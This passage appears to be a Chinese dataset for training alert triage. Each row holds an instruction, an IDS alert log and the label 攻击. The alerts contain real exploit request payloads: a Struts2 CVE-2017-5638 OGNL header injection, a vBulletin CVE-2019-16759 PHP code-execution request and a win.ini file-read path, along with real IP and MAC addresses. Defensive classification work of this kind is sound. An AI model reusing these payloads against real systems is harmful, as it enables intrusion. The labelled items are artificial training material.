filename=\"%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-RES',41335*43058)}\u0000b\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n--29f6af0eeb7dccbcc9b7fd4da3c74cd8e724acb1b3af5904dca36a0df773--\r\n", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569558-发现java可疑类绕过攻击", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12867", "h_url": "/"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688192", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "代码执行", "_origin": {"write_date": 1732688192, "vuln_harm": "攻击者可以通过PHP代码执行获取应用服务器信息,甚至获取服务器权限。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.23.68.194", "site_app": "通用", "hit_end": 63, "uri": "/", "dport": 30001, "vuln_name": "PHP代码执行攻击", "rsp_status": 0, "code_language": "PHP", "solution": "1,开发中要对关键函数要谨慎使用,对用户可控参数要做严格控制。\r\n2,避免未经检查的输入数据进入代码逻辑。", "hit_start": 43, "detail_info": "远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "xff": "", "sip": "223.160.174.104", "vuln_desc": "远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "public_date": "2018-09-13 16:03:57", "sport": 12873}, "detail_info": "远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "file_md5": "", "rule_key": "webids", "api": "218.76.15.56:30001/", "first_access_time": "2024-11-27 14:16:32", "hazard_level": "8", "hazard_rating": "危急", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "PHP代码执行攻击", "alarm_sip": "172.23.68.194", "routestring": "ajax/render/widget_php", "skyeye_index": "", "sip_ioc_dip": "fdac32a0203c499d7bfde4b715c2e014", "xff": "", "vuln_desc": "远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "attack_chain": "0x02010000", "vuln_harm": "攻击者可以通过PHP代码执行获取应用服务器信息,甚至获取服务器权限。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688172", "code_language": "PHP", "public_date": "2018-09-13 16:03:57", "skyeye_serial_num": "QbJK/8ze/", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "63", "h_proto_version": "HTTP/1.1", "uri": "/", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020593", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "PHP代码执行攻击", "attack_type": "代码执行", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1,开发中要对关键函数要谨慎使用,对用户可控参数要做严格控制。\r\n2,避免未经检查的输入数据进入代码逻辑。", "hit_start": "43", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvIEhUVFAvMS4xDQpIb3N0OiAyMTguNzYuMTUuNTY6MzAwMDENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IHJ2Ojc4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzguMA0KQ29udGVudC1MZW5ndGg6IDkwDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkRudDogMQ0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg==", "req_body": "cm91dGVzdHJpbmc9YWpheC9yZW5kZXIvd2lkZ2V0X3BocCZ3aWRnZXRDb25maWclNWJjb2RlJTVkPXByaW50KG1kNSgyMDQ4Mjc1NDAzKSklM2JleGl0JTNi", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_5d152be37629b6d53e594b7a1e6a875b", "access_time": "2024-11-27 14:16:32", "content-length": "90", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16030000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "application/x-www-form-urlencoded", "sip": "223.160.174.104", "dimension": "3", "url_path": "/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST / HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nContent-Length: 90\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: application/x-www-form-urlencoded\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "routestring=ajax/render/widget_php&widgetConfig%5bcode%5d=print(md5(2048275403))%3bexit%3b", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567955-PHP代码执行攻击", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12873", "h_url": "/"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688192", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "代码执行", "_origin": {"write_date": 1732688192, "vuln_harm": "攻击者可以通过PHP代码执行获取应用服务器信息,甚至获取服务器权限。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.23.68.194", "site_app": "通用", "hit_end": 0, "uri": "/", "dport": 30001, "vuln_name": "PHP代码执行攻击(机器学习)", "rsp_status": 0, "code_language": "PHP", "solution": "1,开发中要对关键函数要谨慎使用,对用户可控参数要做严格控制。\r\n2,避免未经检查的输入数据进入代码逻辑。", "hit_start": 0, "detail_info": "PHP代码执行攻击(机器学习)\t\r\n远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "xff": "", "sip": "223.160.174.104", "vuln_desc": "PHP代码执行攻击(机器学习)\t\r\n远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "public_date": "2020-11-25 19:53:49", "sport": 12873}, "detail_info": "PHP代码执行攻击(机器学习)\t\r\n远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "file_md5": "", "rule_key": "webids", "api": "218.76.15.56:30001/", "first_access_time": "2024-11-27 14:16:32", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "PHP代码执行攻击(机器学习)", "alarm_sip": "172.23.68.194", "routestring": "ajax/render/widget_php", "skyeye_index": "", "sip_ioc_dip": "eb65960f241bb83d95058d48e2765e2b", "xff": "", "vuln_desc": "PHP代码执行攻击(机器学习)\t\r\n远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "attack_chain": "0x02020000", "vuln_harm": "攻击者可以通过PHP代码执行获取应用服务器信息,甚至获取服务器权限。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688172", "code_language": "PHP", "public_date": "2020-11-25 19:53:49", "skyeye_serial_num": "QbJK/8ze/", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "0", "h_proto_version": "HTTP/1.1", "uri": "/", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020b70", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "PHP代码执行攻击(机器学习)", "attack_type": "代码执行", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1,开发中要对关键函数要谨慎使用,对用户可控参数要做严格控制。\r\n2,避免未经检查的输入数据进入代码逻辑。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvIEhUVFAvMS4xDQpIb3N0OiAyMTguNzYuMTUuNTY6MzAwMDENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IHJ2Ojc4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzguMA0KQ29udGVudC1MZW5ndGg6IDkwDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkRudDogMQ0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg==", "req_body": "cm91dGVzdHJpbmc9YWpheC9yZW5kZXIvd2lkZ2V0X3BocCZ3aWRnZXRDb25maWclNWJjb2RlJTVkPXByaW50KG1kNSgyMDQ4Mjc1NDAzKSklM2JleGl0JTNi", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_dcb4ab9b6fec09266454c80e449d00ee", "access_time": "2024-11-27 14:16:32", "content-length": "90", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16030000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "application/x-www-form-urlencoded", "sip": "223.160.174.104", "dimension": "3", "url_path": "/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST / HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nContent-Length: 90\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: application/x-www-form-urlencoded\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "routestring=ajax/render/widget_php&widgetConfig%5bcode%5d=print(md5(2048275403))%3bexit%3b", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569456-PHP代码执行攻击(机器学习)", "rule_labels": "{}", "sport": "12873", "h_url": "/"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688192", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "代码执行", "_origin": {"write_date": 1732688192, "vuln_harm": "该漏洞是一个pre-auth(预认证)远程代码执行漏洞,CVSS V3.1评分为9.8。漏洞是vBulletin v 5.0.0版本中引入的一个Ajax渲染函数引发的PHP服务器端模板注入。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.23.68.194", "site_app": "", "hit_end": 53, "uri": "/", "dport": 30001, "vuln_name": "vBulletin pre-auth远程代码执行漏洞(CVE-2019-16759)", "rsp_status": 0, "code_language": "", "solution": "建议管理员尽快更新 vBulletin到version 5.5.2/3/4 Patch Level 1 ,或在管理面板中禁用PHP, Static HTML, Ad Module rendering设置。", "hit_start": 33, "detail_info": "vBulletin 5.x.x 存在远程代码执行漏洞,前台可执行任意shell命令", "xff": "", "sip": "223.160.174.104", "vuln_desc": "vBulletin 5.x.x 存在远程代码执行漏洞,前台可执行任意shell命令", "public_date": "2020-07-27 18:58:22", "sport": 12873}, "detail_info": "vBulletin 5.x.x 存在远程代码执行漏洞,前台可执行任意shell命令", "file_md5": "", "rule_key": "webids", "api": "218.76.15.56:30001/", "first_access_time": "2024-11-27 14:16:32", "hazard_level": "8", "hazard_rating": "危急", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "vBulletin pre-auth远程代码执行漏洞(CVE-2019-16759)", "alarm_sip": "172.23.68.194", "routestring": "ajax/render/widget_php", "skyeye_index": "", "sip_ioc_dip": "acf3a8b287a2560f556052c86b9e8174", "xff": "", "vuln_desc": "vBulletin 5.x.x 存在远程代码执行漏洞,前台可执行任意shell命令", "attack_chain": "0x02010000", "vuln_harm": "该漏洞是一个pre-auth(预认证)远程代码执行漏洞,CVSS V3.1评分为9.8。漏洞是vBulletin v 5.0.0版本中引入的一个Ajax渲染函数引发的PHP服务器端模板注入。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688172", "code_language": "", "public_date": "2020-07-27 18:58:22", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "53", "h_proto_version": "HTTP/1.1", "uri": "/", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020993", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "vBulletin pre-auth远程代码执行漏洞(CVE-2019-16759)", "attack_type": "代码执行", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "建议管理员尽快更新 vBulletin到version 5.5.2/3/4 Patch Level 1 ,或在管理面板中禁用PHP, Static HTML, Ad Module rendering设置。", "hit_start": "33", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvIEhUVFAvMS4xDQpIb3N0OiAyMTguNzYuMTUuNTY6MzAwMDENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IHJ2Ojc4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzguMA0KQ29udGVudC1MZW5ndGg6IDkwDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkRudDogMQ0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg==", "req_body": "cm91dGVzdHJpbmc9YWpheC9yZW5kZXIvd2lkZ2V0X3BocCZ3aWRnZXRDb25maWclNWJjb2RlJTVkPXByaW50KG1kNSgyMDQ4Mjc1NDAzKSklM2JleGl0JTNi", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_b42793a8db933995d6e6c90ecdc1245d", "access_time": "2024-11-27 14:16:32", "content-length": "90", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16030000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "application/x-www-form-urlencoded", "sip": "223.160.174.104", "dimension": "3", "url_path": "/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST / HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nContent-Length: 90\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: application/x-www-form-urlencoded\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "routestring=ajax/render/widget_php&widgetConfig%5bcode%5d=print(md5(2048275403))%3bexit%3b", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268568979-vBulletin pre-auth远程代码执行漏洞(CVE-2019-16759)", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12873", "h_url": "/"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688190", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "文件读取", "_origin": {"write_date": 1732688190, "vuln_harm": "发现读取Windows敏感文件,攻击者尝试利用文件包含漏洞读取Windows主机web服务器的敏感文件。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.68.194", "site_app": "", "hit_end": 33, "uri": "/web/static/c:/windows/win.ini", "dport": 30001, "vuln_name": "发现读取Windows敏感文件行为", "rsp_status": 0, "code_language": "", "solution": "如果读取成功,请修复文件读取漏洞,设置文件读取权限。", "hit_start": 13, "detail_info": "发现读取Windows敏感文件,攻击者尝试利用文件包含漏洞读取Windows主机web服务器的敏感文件。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "发现读取Windows敏感文件,攻击者尝试利用文件包含漏洞读取Windows主机web服务器的敏感文件。", "public_date": "2023-07-31 16:36:47", "sport": 12506}, "detail_info": "发现读取Windows敏感文件,攻击者尝试利用文件包含漏洞读取Windows主机web服务器的敏感文件。", "file_md5": "f4149b219662d69ed2cf8cb4d1dec4cd", "rule_key": "webids", "api": "218.76.15.56:30001/web/static/c:/windows/win.ini", "first_access_time": "2024-11-27 14:16:30", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现读取Windows敏感文件行为", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "cce3862abe9c812d19e96353a46d9a33", "xff": "", "vuln_desc": "发现读取Windows敏感文件,攻击者尝试利用文件包含漏洞读取Windows主机web服务器的敏感文件。", "attack_chain": "0x02020000", "vuln_harm": "发现读取Windows敏感文件,攻击者尝试利用文件包含漏洞读取Windows主机web服务器的敏感文件。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688170", "code_language": "", "public_date": "2023-07-31 16:36:47", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "33", "h_proto_version": "HTTP/1.1", "uri": "/web/static/c:/windows/win.ini", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x1002171a", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "发现读取Windows敏感文件行为", "attack_type": "文件读取", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "如果读取成功,请修复文件读取漏洞,设置文件读取权限。", "hit_start": "13", "skyeye_id": "", "payload": {"req_header": "R0VUIC93ZWIvc3RhdGljL2M6L3dpbmRvd3Mvd2luLmluaSBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjU2OjMwMDAxDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBydjo3OC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94Lzc4LjANCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQpEbnQ6IDENClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_d3f1c1f12f031852fdf8294395e40e15", "access_time": "2024-11-27 14:16:30", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16100000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "dimension": "3", "url_path": "/web/static/c:/windows/win.ini", "src_mac": "00:94:a1:5e:6e:87", "file_name": "win.ini", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /web/static/c:/windows/win.ini HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268572442-发现读取Windows敏感文件行为", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12506", "h_url": "/web/static/c:/windows/win.ini"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688187", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "命令执行", "_origin": {"write_date": 1732688187, "vuln_harm": "Apache Struts2是一种国内使用非常广泛的Web应用开发框架,被大量的Web网站所使用。目前,对于此漏洞的利用代码已经扩散,恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令,对网站安全构成非常高的现实威胁。影响系统及版本:Struts 2.3.5 - Struts 2.3.31、Struts 2.5 - Struts 2.5.10。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.68.194", "site_app": "Struts", "hit_end": 191, "uri": "/", "dport": 30001, "vuln_name": "Struts2-045远程命令执行漏洞(CVE-2017-5638)", "rsp_status": 0, "code_language": "Java", "solution": "1、升级到Struts2.3.32 或者Struts 2.5.10.1版本。官方升级地址:https://dist.apache.org/repos/dist/release/struts/2.5.10.1/, https://dist.apache.org/repos/dist/release/struts/2.3.32/。\r\n2、删除commons-fileupload-x.x.x.jar文件。请注意删除该文件可能导致网站的上传功能或其他应用无法正常使用。", "hit_start": 171, "detail_info": "该漏洞是Apache strut2 最新的一个漏洞,CVE编号CVE-2017-5638.(基于 Jakarta plugin插件的Struts远程代码执行漏洞),该漏洞会造成RCE远程代码执行,恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令,可直接造成系统被控制。黑客通过Jakarta 文件上传插件实现远程利用该漏洞执行代码。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "该漏洞是Apache strut2 最新的一个漏洞,CVE编号CVE-2017-5638.(基于 Jakarta plugin插件的Struts远程代码执行漏洞),该漏洞会造成RCE远程代码执行,恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令,可直接造成系统被控制。黑客通过Jakarta 文件上传插件实现远程利用该漏洞执行代码。", "public_date": "2017-03-07 11:28:25", "sport": 12510}, "detail_info": "该漏洞是Apache strut2 最新的一个漏洞,CVE编号CVE-2017-5638.(基于 Jakarta plugin插件的Struts远程代码执行漏洞),该漏洞会造成RCE远程代码执行,恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令,可直接造成系统被控制。黑客通过Jakarta 文件上传插件实现远程利用该漏洞执行代码。", "file_md5": "", "rule_key": "webids", "api": "218.76.15.56:30001/", "first_access_time": "2024-11-27 14:16:27", "hazard_level": "8", "hazard_rating": "危急", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Struts2-045远程命令执行漏洞(CVE-2017-5638)", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "66bd557c5639eedb19915bfb45f50b5c", "xff": "", "vuln_desc": "该漏洞是Apache strut2 最新的一个漏洞,CVE编号CVE-2017-5638.(基于 Jakarta plugin插件的Struts远程代码执行漏洞),该漏洞会造成RCE远程代码执行,恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令,可直接造成系统被控制。黑客通过Jakarta 文件上传插件实现远程利用该漏洞执行代码。", "attack_chain": "0x02020000", "vuln_harm": "Apache Struts2是一种国内使用非常广泛的Web应用开发框架,被大量的Web网站所使用。目前,对于此漏洞的利用代码已经扩散,恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令,对网站安全构成非常高的现实威胁。影响系统及版本:Struts 2.3.5 - Struts 2.3.31、Struts 2.5 - Struts 2.5.10。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688166", "code_language": "Java", "public_date": "2017-03-07 11:28:25", "skyeye_serial_num": "QbJK/8ze/", "site_app": "Struts", "super_attack_chain": "0x02000000", "hit_end": "191", "h_proto_version": "HTTP/1.1", "uri": "/", "dst_mac": 